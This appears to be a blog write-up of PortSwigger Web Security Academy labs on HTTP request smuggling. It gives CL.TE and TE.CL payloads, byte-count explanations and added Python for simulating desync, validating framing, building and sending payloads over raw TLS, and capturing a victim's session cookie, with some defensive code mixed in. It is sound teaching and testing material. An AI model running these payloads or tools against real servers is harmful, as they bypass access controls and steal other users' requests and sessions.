All labs | Web Security Academy (portswigger.net)

HTTP request smuggling

1. HTTP request smuggling, basic CL.TE vulnerability


  • When Content-Length and Transfer-Encoding both appear in a request, a recipient is supposed to apply Transfer-Encoding and ignore Content-Length (RFC 7230 §3.3.3), because chunked encoding frames the body on its own. The vulnerability is that the two servers disagree: in CL.TE the front-end frames the body by Content-Length and the back-end frames it by Transfer-Encoding.

  • This lab is solved by setting Content-Length to cover the whole body while the chunked body ends early. The front-end forwards all 6 bytes (0, CRLF, CRLF, G); the back-end stops at the zero-size chunk and keeps the trailing G in its buffer, so the next request on that connection arrives as GPOST / HTTP/1.1. Send the request twice: the second response reports the unrecognised method GPOST.

```http
POST / HTTP/1.1
Host: 0a06001d03118aa0c4626eb800680067.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G
```


2. HTTP request smuggling, basic TE.CL vulnerability


  • The difference from lab 1 is that the roles are reversed: the front-end honours Transfer-Encoding and the back-end honours Content-Length. The chunked encoding is what carries the smuggled request through the front-end, and a tiny Content-Length is what makes the back-end cut the body short.

  • Content-length is declared as 4 and Transfer-Encoding: chunked is sent as well. The front-end reads the body as chunks: the first size line is 5c (hex, 92 decimal), so the next 92 bytes, from GPOST / HTTP/1.1 through x=1, are chunk data, followed by the 0 chunk that terminates the body.

  • The back-end ignores Transfer-Encoding and reads only 4 bytes of body, which is exactly the size line 5c plus its CRLF. Everything after it, starting with GPOST / HTTP/1.1, stays in the connection buffer and is parsed as the next request. That smuggled request claims Content-Length: 15 but only 10 bytes follow it (x=1, CRLF, 0, CRLF, CRLF), so the back-end takes the first 5 bytes of whatever request arrives next to complete it. Practical note: the blank line after the final 0 must be kept, otherwise the chunked body is never terminated and the front-end hangs, and in Burp Repeater the "Update Content-Length" option has to be switched off or the 4 gets rewritten.

```http
POST / HTTP/1.1
Host: 0a83009b049ca08ec342d8a2002f0070.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

```

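To see exactly where the two servers disagree, the following added example (not part of the write-up, and not PortSwigger code) models a server that frames by Content-Length and one that frames by chunked encoding, then pushes the lab 1 and lab 2 payloads through each pair. The payloads are the ones shown above; the follow-up request VICTIM is constructed.

```python
"""Added example (not from the write-up): model the two framing rules and replay the
lab 1 (CL.TE) and lab 2 (TE.CL) payloads through them to see what each server keeps.
The payloads are copied from the write-up; VICTIM is a constructed follow-up request."""


def split_head(stream: bytes):
    """Return (request_line, headers, body_offset), or None if the head is incomplete."""
    end = stream.find(b"\r\n\r\n")
    if end < 0:
        return None
    lines = stream[:end].split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, end + 4


def frame_by_content_length(stream: bytes):
    """Rule of a server that honours Content-Length and ignores Transfer-Encoding.
    Returns (one_request, leftover) or None while the body is still incomplete."""
    parsed = split_head(stream)
    if parsed is None:
        return None
    _, headers, body_start = parsed
    length = int(headers.get(b"content-length", [b"0"])[0])
    end = body_start + length
    if len(stream) < end:
        return None
    return stream[:end], stream[end:]


def frame_by_chunked(stream: bytes):
    """Rule of a server that honours Transfer-Encoding: chunked and ignores Content-Length."""
    parsed = split_head(stream)
    if parsed is None:
        return None
    _, _, pos = parsed
    while True:
        eol = stream.find(b"\r\n", pos)
        if eol < 0:
            return None
        size = int(stream[pos:eol].split(b";")[0], 16)  # hex size, optional extension dropped
        pos = eol + 2
        if size == 0:
            while True:  # trailer section ends with an empty line
                eol = stream.find(b"\r\n", pos)
                if eol < 0:
                    return None
                empty = eol == pos
                pos = eol + 2
                if empty:
                    return stream[:pos], stream[pos:]
        if stream[pos + size:pos + size + 2] != b"\r\n":
            return None  # chunk data not fully received (or not CRLF-terminated)
        pos += size + 2


def desync(front_rule, back_rule, stream: bytes) -> bytes:
    """The front-end frames one request with front_rule and forwards exactly those bytes;
    the back-end frames them with back_rule. Returns what the back-end leaves in its
    buffer, i.e. the bytes that get glued onto the next request on that connection."""
    forwarded, _ = front_rule(stream)
    _, leftover = back_rule(forwarded)
    return leftover


def next_request_seen_by_backend(leftover: bytes, victim: bytes, back_rule=frame_by_content_length):
    """First request the back-end parses once the victim's bytes follow the leftover."""
    framed = back_rule(leftover + victim)
    return None if framed is None else framed[0]


# Lab 1 payload (CL.TE) as shown in the write-up, with explicit CRLFs.
CL_TE = (b"POST / HTTP/1.1\r\n"
         b"Host: 0a06001d03118aa0c4626eb800680067.web-security-academy.net\r\n"
         b"Connection: keep-alive\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: 6\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n"
         b"0\r\n\r\nG")

# Lab 2 payload (TE.CL): 0x5c = 92 bytes of chunk data, then the terminating 0 chunk.
TE_CL = (b"POST / HTTP/1.1\r\n"
         b"Host: 0a83009b049ca08ec342d8a2002f0070.web-security-academy.net\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-length: 4\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n"
         b"5c\r\n"
         b"GPOST / HTTP/1.1\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: 15\r\n\r\n"
         b"x=1\r\n"
         b"0\r\n\r\n")

# Constructed: the next (innocent) request that reuses the same back-end connection.
VICTIM = b"POST / HTTP/1.1\r\nHost: victim\r\nContent-Length: 3\r\n\r\nq=1"
```

Running `desync(frame_by_content_length, frame_by_chunked, CL_TE)` yields the single byte `G`, and `next_request_seen_by_backend(b"G", VICTIM)` begins with `GPOST / HTTP/1.1`. With the rules swapped for TE_CL, the leftover is the whole GPOST request; `frame_by_content_length` returns None on it (15 bytes claimed, 10 present), and only after VICTIM is appended does it complete, having eaten the first five bytes `POST ` of the victim's request line.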

3. HTTP request smuggling, obfuscating the TE header


  • Two Transfer-Encoding headers are sent to confuse the pair of servers: one with the value chunked, the other with the value cow. One server processes the first header and treats the body as chunked; the other sees the unrecognised value, ignores Transfer-Encoding and falls back to Content-Length, so the request behaves like TE.CL.
  • The chunk data is the same as in lab 2: a GPOST request carrying the parameter x=1.
```http
POST / HTTP/1.1
Host: 0a5200a4048704c8c3857a68009c004f.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
Transfer-encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

```

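The defensive counterpart, as an added example that is not part of the write-up: the framing checks a front-end (or any component that forwards requests) should run before trusting a request, so that header tricks such as the duplicated Transfer-Encoding above are refused instead of being interpreted two different ways. The rules follow RFC 7230 §3.3.3 / RFC 9112 §6; LAB3_HEAD is the request shown above, the other samples are constructed.

```python
"""Added example, not from the write-up: the framing checks a front-end (or any parser
that forwards requests) should run before using a request, so that header tricks such as
the double Transfer-Encoding in lab 3 are refused instead of being interpreted two
different ways. The rules are those of RFC 7230 section 3.3.3 / RFC 9112 section 6.
LAB3_HEAD is the lab request from the write-up; the other samples are constructed."""
import re

_HEADER = re.compile(r"^([!#$%&'*+.^_`|~0-9A-Za-z-]+):[ \t]*(.*?)[ \t]*$")
_KNOWN_CODINGS = {"chunked", "gzip", "x-gzip", "deflate", "compress", "x-compress"}


def parse_head(raw: bytes):
    """Split the head into (request_line, [(lower-case name, value)], problems). A line
    whose name is not a strict token (space before the colon, leading whitespace, ...)
    is reported rather than guessed at."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *lines = head.split("\r\n")
    fields, problems = [], []
    for line in lines:
        m = _HEADER.match(line)
        if m is None:
            problems.append(f"malformed header line {line!r}")
            continue
        fields.append((m.group(1).lower(), m.group(2)))
    return request_line, fields, problems


def framing_violations(raw: bytes):
    """Reasons to reject the request with 400 (or 501) instead of forwarding it."""
    _, fields, problems = parse_head(raw)
    te = [v for n, v in fields if n == "transfer-encoding"]
    cl = [v for n, v in fields if n == "content-length"]
    if te and cl:
        problems.append("Content-Length and Transfer-Encoding both present: reject, "
                        "or drop Content-Length before forwarding")
    if len(te) > 1:
        problems.append(f"Transfer-Encoding repeated {len(te)} times")
    codings = [c.strip().lower() for v in te for c in v.split(",")]
    for c in codings:
        if c not in _KNOWN_CODINGS:
            problems.append(f"unknown transfer coding {c!r}: respond 501")
    if codings and codings[-1] != "chunked":
        problems.append(f"final transfer coding is {codings[-1]!r}, not chunked: "
                        "body length undeterminable, respond 400 and close")
    for v in cl:
        if not re.fullmatch(r"[0-9]+", v):
            problems.append(f"non-numeric Content-Length {v!r}")
    if len(set(cl)) > 1:
        problems.append(f"conflicting Content-Length values {cl}")
    elif len(cl) > 1:
        problems.append("Content-Length repeated")
    return problems


def is_forwardable(raw: bytes) -> bool:
    return not framing_violations(raw)


LAB3_HEAD = (b"POST / HTTP/1.1\r\n"
             b"Host: 0a5200a4048704c8c3857a68009c004f.web-security-academy.net\r\n"
             b"Content-Type: application/x-www-form-urlencoded\r\n"
             b"Content-length: 4\r\n"
             b"Transfer-Encoding: chunked\r\n"
             b"Transfer-encoding: cow\r\n\r\n")

# Constructed samples: two clean requests and two common obfuscations.
CLEAN_CL = b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 3\r\n\r\nx=1"
CLEAN_TE = b"POST / HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n"
SPACE_BEFORE_COLON = b"POST / HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding : chunked\r\n\r\n"
XCHUNKED = b"POST / HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding: xchunked\r\n\r\n"
```

`framing_violations(LAB3_HEAD)` reports three separate problems (both length headers present, Transfer-Encoding repeated, and the unknown coding cow as the final coding), any one of which is enough to return 400 and close the connection. The two clean samples pass; the space-before-colon and xchunked variants are caught by the strict token regex and by the final-coding check respectively.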

4. HTTP request smuggling, confirming a CL.TE vulnerability via differential responses


  • The request carries both Content-Length: 35 and Transfer-Encoding: chunked. The back-end honours the chunked encoding: the body consists of nothing but the zero-size chunk, so to the back-end the body is empty.
  • The front-end honours Content-Length and forwards all 35 bytes, which include the trailing GET /404 HTTP/1.1 line and the X-Ignore: X header (deliberately without a final CRLF).
  • The back-end therefore sees two requests: the POST with an empty body, then GET /404 with X-Ignore: X glued onto the request line of whatever comes next (X-Ignore: XPOST / HTTP/1.1 ...). A normal request sent straight after the attack request is answered with 404 instead of 200, which is the differential response that confirms CL.TE.
```http
POST / HTTP/1.1
Host: 0a6800d904fae8a2c5f918c700250023.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: X
```


5. HTTP request smuggling, confirming a TE.CL vulnerability via differential responses


  • The first chunk's size line is 5e (94 decimal); its data is a POST /404 request whose body is x=1.
  • The next size line is 0, marking the last chunk. The front-end decodes the whole chunked body and forwards it; the back-end stops after 4 body bytes (the size line) and treats POST /404 as the next request, so a normal request sent right afterwards receives a 404 response.
```http
POST / HTTP/1.1
Host: 0a7b005103ea6bc6c04abe7a0021006d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

```


6. Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability


```http
POST / HTTP/1.1
Host: 0a51005204ee4262c4d91635002400a6.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
X-Ignore: X
```

Adding Host: localhost to the smuggled request (the admin panel only accepts local requests) makes the Host header clash: the smuggled request has no body of its own, so the victim's request line and its Host header are glued onto it, and the back-end rejects the duplicate Host header.

```http
POST / HTTP/1.1
Host: 0a51005204ee4262c4d91635002400a6.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
X-Ignore: X
```

Turn the smuggled request into a complete request of its own: add Content-Type and a Content-Length of 10 with the body x=, so that the back-end consumes the first 8 bytes of the following request as this body and the duplicate Host header never reaches the parser.

```http
POST / HTTP/1.1
Host: 0a51005204ee4262c4d91635002400a6.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=
```

Delete the user carlos by changing the smuggled URL (Content-Length grows by the 23 extra bytes of the request line):

```http
POST / HTTP/1.1
Host: 0a51005204ee4262c4d91635002400a6.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Transfer-Encoding: chunked

0

GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=
```


7. Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability


```http
POST / HTTP/1.1
Host: 0ad7006803f46b57c050ebab00be0094.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

60
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

```

```http
POST / HTTP/1.1
Host: 0ad7006803f46b57c050ebab00be0094.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

```

Delete the user carlos (the chunk size grows from 71 to 87 with the longer request line):

```http
POST / HTTP/1.1
Host: 0ad7006803f46b57c050ebab00be0094.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

```

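Every payload in labs 4 to 7 stands or falls on the byte count: the outer Content-Length in the CL.TE variants (35, 37, 54, 116, 139) and the hex chunk size in the TE.CL variants (5e, 60, 71, 87) have to be exact, and CRLFs are where people miscount. The following added example (my code, not part of the write-up) builds both payload shapes with the arithmetic done in code and checks the results against the numbers used above. Host names are placeholders; send_raw() is a plain TLS sender for use outside Burp (Repeater rewrites Content-Length unless "Update Content-Length" is off) and is defined but not called here.

```python
"""Added example, not part of the write-up: build CL.TE and TE.CL payloads with the
length arithmetic done in code, and check the results against the numbers used in labs
4 to 7 (Content-Length 35, 37, 54, 116, 139 and chunk sizes 5e, 60, 71, 87). Host names
are placeholders. send_raw() pushes bytes over TLS unchanged, for use outside Burp
(Repeater rewrites Content-Length unless "Update Content-Length" is off); it is defined
but not called here."""
import socket
import ssl

FORM = "application/x-www-form-urlencoded"
OUTER_HEAD = b"POST / HTTP/1.1\r\nHost: %s\r\nContent-Type: " + FORM.encode() + b"\r\n"


def inner_request(method, path, headers=(), body=b"", claimed_length=None):
    """The request to be smuggled. A claimed_length larger than len(body) makes the
    back-end complete this body with the first bytes of the *next* request on the
    connection, which is how labs 6 to 9 swallow the victim's request line/headers."""
    lines = [f"{method} {path} HTTP/1.1".encode()]
    lines += [f"{name}: {value}".encode() for name, value in headers]
    if body or claimed_length is not None:
        lines.append(b"Content-Length: %d" % (len(body) if claimed_length is None else claimed_length))
    return b"\r\n".join(lines) + b"\r\n\r\n" + body


def cl_te_payload(host, smuggled):
    """Front-end honours Content-Length (covers the whole body); back-end honours chunked,
    stops at the 0 chunk and keeps `smuggled` for the next request."""
    body = b"0\r\n\r\n" + smuggled
    return (OUTER_HEAD % host.encode() + b"Content-Length: %d\r\n" % len(body)
            + b"Transfer-Encoding: chunked\r\n\r\n" + body)


def te_cl_payload(host, smuggled):
    """Front-end honours chunked (one chunk carries `smuggled`); back-end honours
    Content-Length, which covers only the chunk-size line (4 bytes for a two-digit size
    such as 5c; it is computed, not hard-coded, so larger sizes work too), so the chunk
    data becomes the next request."""
    size_line = b"%x\r\n" % len(smuggled)
    body = size_line + smuggled + b"\r\n0\r\n\r\n"
    return (OUTER_HEAD % host.encode() + b"Content-Length: %d\r\n" % len(size_line)
            + b"Transfer-Encoding: chunked\r\n\r\n" + body)


def outer_content_length(payload):
    """Content-Length value declared in the outer request head."""
    for line in payload.split(b"\r\n\r\n", 1)[0].split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return int(line.split(b":", 1)[1])
    raise ValueError("no Content-Length header")


def first_chunk_size(payload):
    """Size (decimal) announced by the first chunk-size line of the outer body."""
    body = payload.split(b"\r\n\r\n", 1)[1]
    return int(body.split(b"\r\n", 1)[0], 16)


def send_raw(host, payload, port=443, timeout=10.0):
    """Send the payload byte-for-byte over TLS and return everything the server answers."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as tcp, \
            ctx.wrap_socket(tcp, server_hostname=host) as tls:
        tls.sendall(payload)
        chunks = []
        try:
            while True:
                data = tls.recv(65536)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # server kept the connection open; return what we have
        return b"".join(chunks)
```

For example `cl_te_payload("lab.example", b"GET /404 HTTP/1.1\r\nX-Ignore: X")` declares Content-Length: 35 like the lab 4 request, and `te_cl_payload("lab.example", inner_request("POST", "/admin", [("Content-Type", FORM)], b"x=1", claimed_length=15))` produces the 60 chunk size of the first lab 7 request. To deliver a payload, call `send_raw` twice on separate connections: the first sends the poisoned request, the second is the one whose response reveals the smuggled request's effect.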

8. Exploiting HTTP request smuggling to reveal front-end request rewriting


Check whether the search function reflects the value of the search parameter. The smuggled POST claims Content-Length: 200 but carries only search=test, so the back-end completes the body with the start of the next request exactly as the front-end rewrote it, and the search page echoes the added headers back:

```http
POST / HTTP/1.1
Host: 0a4c00e3048d07c6c2e4396b00320006.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Transfer-Encoding: chunked

0

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Connection: close

search=test
```

Take the header name revealed by the first request (here X-OhZACS-Ip, the front-end's way of passing the client IP) and use it to reach the admin panel:

```http
POST / HTTP/1.1
Host: 0a4c00e3048d07c6c2e4396b00320006.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
X-OhZACS-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close

x=1
```

Change the smuggled request's URL to delete the user carlos:

```http
POST / HTTP/1.1
Host: 0a4c00e3048d07c6c2e4396b00320006.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Transfer-Encoding: chunked

0

GET /admin/delete?username=carlos HTTP/1.1
X-OhZACS-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close

x=1
```


9. Exploiting HTTP request smuggling to capture other users’ requests


  1. Open a blog post, submit a comment and capture the request.
  2. Increase the Content-Length of the smuggled request little by little until the entire cookie is captured (comment= must be the last form parameter so that the victim's request lands in the stored comment).
```http
POST / HTTP/1.1
Host: 0a5f00f5030f2821c174b72d00c100e3.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 256
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 600
Cookie: session=enYe7PbIpOv50lcgDeOWdEO3Ymf6m7dq

csrf=XsZYgcHX6NuQAkteJIBenpeAfd8nNMiY&postId=5&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=comment+2
```

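Why the Content-Length has to be tuned rather than simply set large is easiest to see by simulating what the back-end stores. The following added example (my code, not part of the write-up) reads the claimed number of body bytes from the attacker's form fields plus the next request on the connection, exactly as the back-end does, and sweeps the claimed length upward the way step 2 describes. The form fields are the ones from the lab request above; VICTIM_REQUEST and its session value are constructed.

```python
"""Added example, not from the write-up: why the Content-Length of the smuggled comment
request in lab 9 has to be raised step by step. The back-end reads exactly the claimed
number of body bytes; whatever the attacker's request does not supply is taken from the
next request on the connection (the victim's) and ends up stored as the comment. Too
small and the cookie is cut off; more than attacker body + victim request and the
back-end waits for bytes that never arrive. The form fields are the ones from the lab
write-up; VICTIM_REQUEST and its session value are constructed."""
import re
from urllib.parse import unquote_plus

ATTACKER_BODY = (b"csrf=XsZYgcHX6NuQAkteJIBenpeAfd8nNMiY&postId=5&name=Carlos+Montoya"
                 b"&email=carlos%40normal-user.net&website=&comment=")  # comment= must be last
VICTIM_REQUEST = (b"GET / HTTP/1.1\r\n"
                  b"Host: lab.example\r\n"
                  b"Cookie: session=Wq8v7dYzK3pH1bN0cXr5LtE9mJ2uS4aG\r\n"
                  b"Accept-Language: en\r\n\r\n")  # constructed victim request


def stored_fields(claimed, attacker_body=ATTACKER_BODY, next_request=VICTIM_REQUEST):
    """Form fields the back-end stores for a smuggled POST claiming `claimed` body bytes,
    or None when that many bytes are not on the wire (the back-end stalls and the
    attacker's request times out)."""
    wire = attacker_body + next_request
    if claimed > len(wire):
        return None
    fields = {}
    for pair in wire[:claimed].split(b"&"):  # a '&' inside the victim's bytes would cut the comment short
        name, _, value = pair.partition(b"=")
        fields[unquote_plus(name.decode("latin-1"))] = unquote_plus(value.decode("latin-1"))
    return fields


def captured_session(claimed, attacker_body=ATTACKER_BODY, next_request=VICTIM_REQUEST):
    """Session token visible in the stored comment; None if missing or cut off
    (only a cookie line terminated by CRLF counts as complete)."""
    fields = stored_fields(claimed, attacker_body, next_request)
    if fields is None:
        return None
    m = re.search(r"session=([A-Za-z0-9]+)\r\n", fields.get("comment", ""))
    return m.group(1) if m else None


def smallest_working_length(attacker_body=ATTACKER_BODY, next_request=VICTIM_REQUEST):
    """Sweep the claimed Content-Length upward, as the lab instructs, and return the first
    value at which the whole cookie line is captured."""
    for claimed in range(len(attacker_body), len(attacker_body) + len(next_request) + 1):
        if captured_session(claimed, attacker_body, next_request):
            return claimed
    return None
```

With these inputs the sweep settles on 200: the 115 bytes of the attacker's own fields plus the 85 bytes of the victim's request up to and including the cookie line. One byte less and the token is present but unterminated, so it cannot be trusted as complete; a value like the 600 used in the lab request above is larger than everything on this short connection, so the back-end would simply keep waiting. Against the real lab the victim's request is longer and sent by a browser, which is why the page's step 2 says to raise the value gradually and watch the comments.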
10. Exploiting HTTP request smuggling to deliver reflected XSS



© Rabbit, built with Stellar
